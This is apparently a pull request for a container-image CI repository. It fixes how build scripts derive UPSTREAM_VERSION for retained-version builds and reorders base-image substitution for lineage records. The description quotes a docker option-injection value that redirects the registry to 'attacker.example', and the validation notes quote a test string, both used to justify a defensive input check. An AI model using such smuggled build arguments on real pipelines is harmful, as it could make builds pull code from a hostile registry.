### PR TITLE
fix(ci): retained-version UPSTREAM_VERSION + lineage substitution order (#507)

### DIFF
--- a/php/build
+++ b/php/build
@@ -14,12 +14,19 @@ if [[ -n "${VERSION:-}" ]]; then
         exit 1
     fi
 else
-    if ! UPSTREAM_VERSION=$("$SCRIPT_DIR/version.sh" --upstream); then
-        echo "ERROR: version.sh --upstream failed; cannot resolve UPSTREAM_VERSION" >&2
+    # php/version.sh does not support --upstream — its default output is the full
+    # tag (e.g. "8.5.6-fpm-alpine"). Strip the suffix here for parity.
+    if ! _RAW_TAG=$("$SCRIPT_DIR/version.sh"); then
+        echo "ERROR: version.sh failed; cannot resolve UPSTREAM_VERSION" >&2
         exit 1
     fi
-    if [[ -z "$UPSTREAM_VERSION" ]]; then
-        echo "ERROR: version.sh --upstream returned empty; cannot resolve UPSTREAM_VERSION" >&2
+    if [[ -z "$_RAW_TAG" ]]; then
+        echo "ERROR: version.sh returned empty; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+    UPSTREAM_VERSION="${_RAW_TAG%-fpm-alpine}"
+    if [[ "$UPSTREAM_VERSION" == "$_RAW_TAG" ]]; then
+        echo "ERROR: version.sh output '$_RAW_TAG' does not end with expected -fpm-alpine suffix" >&2
         exit 1
     fi
 fi

--- a/php/build
+++ b/php/build
@@ -2,7 +2,7 @@
 
 # Pre-build script for PHP
 # Sets dynamic build arguments not in config.yaml
-SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 
 # Get raw upstream version (without -fpm-alpine suffix) for source download
 # Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).

--- a/php/build
+++ b/php/build
@@ -1,0 +1,31 @@
+#!/bin/bash
+
+# Pre-build script for PHP
+# Sets dynamic build arguments not in config.yaml
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+
+# Get raw upstream version (without -fpm-alpine suffix) for source download
+# Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).
+if [[ -n "${VERSION:-}" ]]; then
+    # Strip the -fpm-alpine suffix (set by version.sh's TAG_SUFFIX) to get the raw PHP source version.
+    UPSTREAM_VERSION="${VERSION%-fpm-alpine}"
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: VERSION=$VERSION resolves to empty UPSTREAM_VERSION after suffix strip" >&2
+        exit 1
+    fi
+else
+    if ! UPSTREAM_VERSION=$("$SCRIPT_DIR/version.sh" --upstream); then
+        echo "ERROR: version.sh --upstream failed; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: version.sh --upstream returned empty; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+fi
+
+echo "Building PHP ${VERSION} (source: ${UPSTREAM_VERSION})"
+
+CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"
+
+export CUSTOM_BUILD_ARGS

--- a/php/build
+++ b/php/build
@@ -31,6 +31,14 @@ else
     fi
 fi
 
+# Sanity-check: UPSTREAM_VERSION must be a safe version identifier.
+# Prevents shell/docker option injection if VERSION came from an untrusted
+# source (e.g. a workflow_dispatch input that contained whitespace or '--').
+if ! [[ "$UPSTREAM_VERSION" =~ ^[A-Za-z0-9._-]+$ ]]; then
+    echo "ERROR: UPSTREAM_VERSION='$UPSTREAM_VERSION' contains unsafe characters (allowed: A-Z, a-z, 0-9, dot, underscore, hyphen)" >&2
+    exit 1
+fi
+
 echo "Building PHP ${VERSION} (source: ${UPSTREAM_VERSION})"
 
 CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"

--- a/scripts/build-container.sh
+++ b/scripts/build-container.sh
@@ -119,17 +119,22 @@ _resolve_base_image() {
         [[ -z "$_BASE_IMAGE_REF" ]] && _BASE_IMAGE_REF=$(grep -E '^FROM ' "$dockerfile" | tail -1 | awk '{print $2}' || true)
     fi
 
-    # Substitute known variables into the base image template
+    # Substitute known variables into the base image template.
+    #
+    # Ordering rationale: CUSTOM_BUILD_ARGS overrides must be parsed and applied
+    # BEFORE the standard VERSION/UPSTREAM_VERSION substitutions so that a build
+    # script's explicit --build-arg UPSTREAM_VERSION=<retained> wins over the
+    # helper-resolved _UPSTREAM_VERSION (which always reflects the latest upstream).
+    # Without this order, retained-version builds (e.g. terraform) would record the
+    # wrong base_image_ref in the lineage file because _UPSTREAM_VERSION (latest)
+    # would be substituted first, and the CUSTOM_BUILD_ARGS override would arrive
+    # too late to correct an already-expanded placeholder.
+    # Order: (1) parse CUSTOM_BUILD_ARGS, (2) apply overrides, (3) standard
+    # substitutions (no-ops for placeholders already consumed in step 2),
+    # (4) Dockerfile ARG defaults.
     if [[ "$_BASE_IMAGE_REF" =~ \$ ]]; then
-        _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{VERSION\}/$version}"
-        _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$VERSION/$version}"
-        [[ -n "${_MAJOR_VERSION:-}" ]] && _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{MAJOR_VERSION\}/$_MAJOR_VERSION}"
-        [[ -n "${_UPSTREAM_VERSION:-}" ]] && _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{UPSTREAM_VERSION\}/$_UPSTREAM_VERSION}"
-
-        # Collect CUSTOM_BUILD_ARGS overrides before applying ARG defaults.
-        # Docker semantics: --build-arg wins over ARG default; apply overrides FIRST
-        # so that ARG-default substitution (below) is skipped for overridden args.
-        # Parse LAST occurrence of each --build-arg NAME=VALUE (last wins, matching docker).
+        # Step 1 + 2: Parse CUSTOM_BUILD_ARGS and apply overrides first so they win
+        # over all subsequent substitutions. Docker semantics: last --build-arg wins.
         declare -A _custom_arg_overrides=()
         if [[ -n "${CUSTOM_BUILD_ARGS:-}" ]]; then
             while read -r arg_val; do
@@ -139,14 +144,21 @@ _resolve_base_image() {
             done < <(echo "$CUSTOM_BUILD_ARGS" | grep -oE '\-\-build-arg [^ ]+' | sed 's/--build-arg //' || true)
         fi
 
-        # Apply CUSTOM_BUILD_ARGS overrides now (before ARG defaults) so they win.
+        # Apply CUSTOM_BUILD_ARGS overrides before standard substitutions.
         for _ov_name in "${!_custom_arg_overrides[@]}"; do
             local _ov_value="${_custom_arg_overrides[$_ov_name]}"
             _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{$_ov_name\}/$_ov_value}"
             _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$$_ov_name/$_ov_value}"
         done
 
-        # Resolve Dockerfile ARG defaults (e.g. ARG REMOTE_CR=docker.io) for any
+        # Step 3: Standard substitutions. These are no-ops for any placeholder
+        # already consumed by a CUSTOM_BUILD_ARGS override above.
+        _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{VERSION\}/$version}"
+        _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$VERSION/$version}"
+        [[ -n "${_MAJOR_VERSION:-}" ]] && _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{MAJOR_VERSION\}/$_MAJOR_VERSION}"
+        [[ -n "${_UPSTREAM_VERSION:-}" ]] && _BASE_IMAGE_REF="${_BASE_IMAGE_REF//\$\{UPSTREAM_VERSION\}/$_UPSTREAM_VERSION}"
+
+        # Step 4: Resolve Dockerfile ARG defaults (e.g. ARG REMOTE_CR=docker.io) for any
         # variables not already substituted by a CUSTOM_BUILD_ARGS override above.
         while IFS= read -r arg_line; do
             local arg_name="${arg_line%%=*}"

--- a/sslh/build
+++ b/sslh/build
@@ -2,7 +2,7 @@
 
 # Pre-build script for sslh
 # Sets dynamic build arguments not in config.yaml
-SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 
 # Get raw upstream version (without -alpine suffix) for source download
 # Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).

--- a/sslh/build
+++ b/sslh/build
@@ -24,6 +24,14 @@ else
     fi
 fi
 
+# Sanity-check: UPSTREAM_VERSION must be a safe version identifier.
+# Prevents shell/docker option injection if VERSION came from an untrusted
+# source (e.g. a workflow_dispatch input that contained whitespace or '--').
+if ! [[ "$UPSTREAM_VERSION" =~ ^[A-Za-z0-9._-]+$ ]]; then
+    echo "ERROR: UPSTREAM_VERSION='$UPSTREAM_VERSION' contains unsafe characters (allowed: A-Z, a-z, 0-9, dot, underscore, hyphen)" >&2
+    exit 1
+fi
+
 echo "Building sslh ${VERSION} (source: ${UPSTREAM_VERSION})"
 
 CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"

--- a/sslh/build
+++ b/sslh/build
@@ -1,0 +1,31 @@
+#!/bin/bash
+
+# Pre-build script for sslh
+# Sets dynamic build arguments not in config.yaml
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+
+# Get raw upstream version (without -alpine suffix) for source download
+# Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).
+if [[ -n "${VERSION:-}" ]]; then
+    # Strip the -alpine suffix (set by version.sh's TAG_SUFFIX) to get the raw sslh source version.
+    UPSTREAM_VERSION="${VERSION%-alpine}"
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: VERSION=$VERSION resolves to empty UPSTREAM_VERSION after suffix strip" >&2
+        exit 1
+    fi
+else
+    if ! UPSTREAM_VERSION=$("$SCRIPT_DIR/version.sh" --upstream); then
+        echo "ERROR: version.sh --upstream failed; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: version.sh --upstream returned empty; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+fi
+
+echo "Building sslh ${VERSION} (source: ${UPSTREAM_VERSION})"
+
+CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"
+
+export CUSTOM_BUILD_ARGS

--- a/terraform/build
+++ b/terraform/build
@@ -102,6 +102,14 @@ else
     fi
 fi
 
+# Sanity-check: UPSTREAM_VERSION must be a safe version identifier.
+# Prevents shell/docker option injection if VERSION came from an untrusted
+# source (e.g. a workflow_dispatch input that contained whitespace or '--').
+if ! [[ "$UPSTREAM_VERSION" =~ ^[A-Za-z0-9._-]+$ ]]; then
+    echo "ERROR: UPSTREAM_VERSION='$UPSTREAM_VERSION' contains unsafe characters (allowed: A-Z, a-z, 0-9, dot, underscore, hyphen)" >&2
+    exit 1
+fi
+
 echo "Building Terraform ${VERSION} (source: ${UPSTREAM_VERSION}) with tools:"
 echo "  TFLint: ${TFLINT_VERSION}"
 echo "  Trivy: ${TRIVY_VERSION}"

--- a/terraform/build
+++ b/terraform/build
@@ -3,7 +3,7 @@
 # Terraform build script - fetches latest tool versions and updates config.yaml
 # config.yaml is the single source of truth for build args
 
-SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 CONFIG_FILE="$SCRIPT_DIR/config.yaml"
 
 # Source the git-tags helper

--- a/terraform/build
+++ b/terraform/build
@@ -82,7 +82,27 @@ AWS_CLI_VERSION=$(get_aws_cli_version)
 AZURE_CLI_VERSION=$(get_azure_cli_version)
 GCP_CLI_VERSION=$(get_gcp_cli_version)
 
-echo "Building Terraform ${VERSION} with tools:"
+# Get raw upstream version (without -alpine suffix) for source download
+# Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).
+if [[ -n "${VERSION:-}" ]]; then
+    # Strip the -alpine suffix (set by version.sh's TAG_SUFFIX) to get the raw Terraform source version.
+    UPSTREAM_VERSION="${VERSION%-alpine}"
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: VERSION=$VERSION resolves to empty UPSTREAM_VERSION after suffix strip" >&2
+        exit 1
+    fi
+else
+    if ! UPSTREAM_VERSION=$("$SCRIPT_DIR/version.sh" --upstream); then
+        echo "ERROR: version.sh --upstream failed; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: version.sh --upstream returned empty; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+fi
+
+echo "Building Terraform ${VERSION} (source: ${UPSTREAM_VERSION}) with tools:"
 echo "  TFLint: ${TFLINT_VERSION}"
 echo "  Trivy: ${TRIVY_VERSION}"
 echo "  Terragrunt: ${TERRAGRUNT_VERSION}"
@@ -104,4 +124,8 @@ yq -i ".build_args.GCP_CLI_VERSION = \"${GCP_CLI_VERSION}\"" "$CONFIG_FILE"
 
 echo "Updated config.yaml with latest tool versions"
 
-# No CUSTOM_BUILD_ARGS needed — build-container.sh reads config.yaml directly
+# Propagate UPSTREAM_VERSION so the Dockerfile's ${UPSTREAM_VERSION:-${VERSION}} resolves correctly
+# for retained-version builds (where VERSION carries the -alpine suffix).
+CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"
+
+export CUSTOM_BUILD_ARGS

--- a/vector/build
+++ b/vector/build
@@ -1,0 +1,31 @@
+#!/bin/bash
+
+# Pre-build script for Vector
+# Sets dynamic build arguments not in config.yaml
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+
+# Get raw upstream version (without -alpine suffix) for source download
+# Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).
+if [[ -n "${VERSION:-}" ]]; then
+    # Strip the -alpine suffix (set by version.sh's TAG_SUFFIX) to get the raw Vector source version.
+    UPSTREAM_VERSION="${VERSION%-alpine}"
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: VERSION=$VERSION resolves to empty UPSTREAM_VERSION after suffix strip" >&2
+        exit 1
+    fi
+else
+    if ! UPSTREAM_VERSION=$("$SCRIPT_DIR/version.sh" --upstream); then
+        echo "ERROR: version.sh --upstream failed; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+    if [[ -z "$UPSTREAM_VERSION" ]]; then
+        echo "ERROR: version.sh --upstream returned empty; cannot resolve UPSTREAM_VERSION" >&2
+        exit 1
+    fi
+fi
+
+echo "Building Vector ${VERSION} (source: ${UPSTREAM_VERSION})"
+
+CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"
+
+export CUSTOM_BUILD_ARGS

--- a/vector/build
+++ b/vector/build
@@ -24,6 +24,14 @@ else
     fi
 fi
 
+# Sanity-check: UPSTREAM_VERSION must be a safe version identifier.
+# Prevents shell/docker option injection if VERSION came from an untrusted
+# source (e.g. a workflow_dispatch input that contained whitespace or '--').
+if ! [[ "$UPSTREAM_VERSION" =~ ^[A-Za-z0-9._-]+$ ]]; then
+    echo "ERROR: UPSTREAM_VERSION='$UPSTREAM_VERSION' contains unsafe characters (allowed: A-Z, a-z, 0-9, dot, underscore, hyphen)" >&2
+    exit 1
+fi
+
 echo "Building Vector ${VERSION} (source: ${UPSTREAM_VERSION})"
 
 CUSTOM_BUILD_ARGS="${CUSTOM_BUILD_ARGS:+$CUSTOM_BUILD_ARGS }--build-arg UPSTREAM_VERSION=${UPSTREAM_VERSION}"

--- a/vector/build
+++ b/vector/build
@@ -2,7 +2,7 @@
 
 # Pre-build script for Vector
 # Sets dynamic build arguments not in config.yaml
-SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 
 # Get raw upstream version (without -alpine suffix) for source download
 # Honor $VERSION when set (CI/dep-rebuild path); fall back to upstream latest (local/manual invocation).


### PR DESCRIPTION
Closes #507

## Summary

Fixes the silent correctness bug where retained-version builds received `UPSTREAM_VERSION` from `helpers/build-args-utils.sh:88` (always latest from `version.sh --upstream`), producing wrong source downloads or wrong provenance labels.

The most visible case was `vector`: building `vector:0.53.0-alpine` would `wget https://github.com/vectordotdev/vector/releases/download/v${UPSTREAM_VERSION}/...` with `UPSTREAM_VERSION=0.55.0` (latest), packaging Vector 0.55.0 source into an image tagged 0.53.0. Build passed, artifact wrong.

## Changes

### New `<container>/build` scripts (sslh, vector, php) + augment terraform/build

Each script honors `$VERSION` (CI matrix / dep-rebuild path) by stripping the variant suffix to derive the upstream source version. Falls back to `version.sh` for local/manual invocation. Pattern matches `openresty/build` (PR #503 Fix B).

- `sslh/build` — strip `-alpine` → `vX.Y.Z`
- `vector/build` — strip `-alpine` → `X.Y.Z`
- `php/build` — strip `-fpm-alpine` → `X.Y.Z` (fallback uses default version.sh output + suffix strip, because `php/version.sh` does not support `--upstream`)
- `terraform/build` — augmented (existing tool-version-sync logic preserved); strip `-alpine` → `X.Y.Z`

### Security validation

Each build script validates the resolved `UPSTREAM_VERSION` against `^[A-Za-z0-9._-]+$` before appending to `CUSTOM_BUILD_ARGS`. Prevents docker option injection if `VERSION` arrives from an untrusted input (e.g. `workflow_dispatch -f scope_versions="0.55.0-alpine --build-arg REMOTE_CR=attacker.example"` — the suffix-strip would otherwise leave embedded `--build-arg` tokens that docker would parse as extra CLI flags).

### Lineage substitution order fix (`scripts/build-container.sh`)

`_resolve_base_image` previously substituted `${UPSTREAM_VERSION}` in `config.yaml` `base_image:` field using the helper-resolved latest value BEFORE applying `CUSTOM_BUILD_ARGS` overrides. For terraform whose config has `base_image: "hashicorp/terraform:${UPSTREAM_VERSION}"`, retained-version builds therefore recorded the wrong `base_image_ref`/`base_image_digest` in lineage (dashboard provenance off by one version).

The function now parses `CUSTOM_BUILD_ARGS` and applies its overrides FIRST. The subsequent standard substitutions become no-ops for any placeholder already consumed. Lineage now records the correct retained-version base image.

## Out of scope (future)

- The same `UPSTREAM_VERSION` resolution lives in `helpers/build-args-utils.sh:88` and `helpers/base-cache-utils.sh:62` (the latter for cache check tags). They still call `version.sh --upstream` unconditionally. Since per-container `build` scripts now propagate the correct value via `CUSTOM_BUILD_ARGS` (which wins via the reorder above), the central-helper fix becomes a lower-priority cleanup — file as a follow-up if needed.
- `ansible` retained-build failure (`${NPROC:?required}` empty) — separate symptom not addressed here. Multi-arch package fix (out-of-band on 2026-05-24) seems to have resolved it; will confirm on master.

## Validation

- bash syntax (`bash -n`) clean on all 5 modified files
- Per-script behavior tests:
  - Safe `VERSION=v9.9.9-alpine` → resolves and appends correctly
  - Unsafe `VERSION="x --build-arg X=Y"` → rejected with explicit error, exit 1
- Pre-PR orthogonal gate: CLEAN (both codex + copilot)

## Test plan

- [ ] CI passes (shellcheck, bats, container builds)
- [ ] Post-merge: trigger `gh workflow run auto-build.yaml -f container=vector -f force_rebuild=true -f build_all_retained=true` and inspect the resulting `vector:0.53.0-alpine` image — its `vector --version` output should report `0.53.0`, not `0.55.0`
- [ ] Trigger terraform retained rebuild and verify `.build-lineage/terraform-1.15.2-alpine.json` records `base_image_ref: "hashicorp/terraform:1.15.2"` (not the latest)
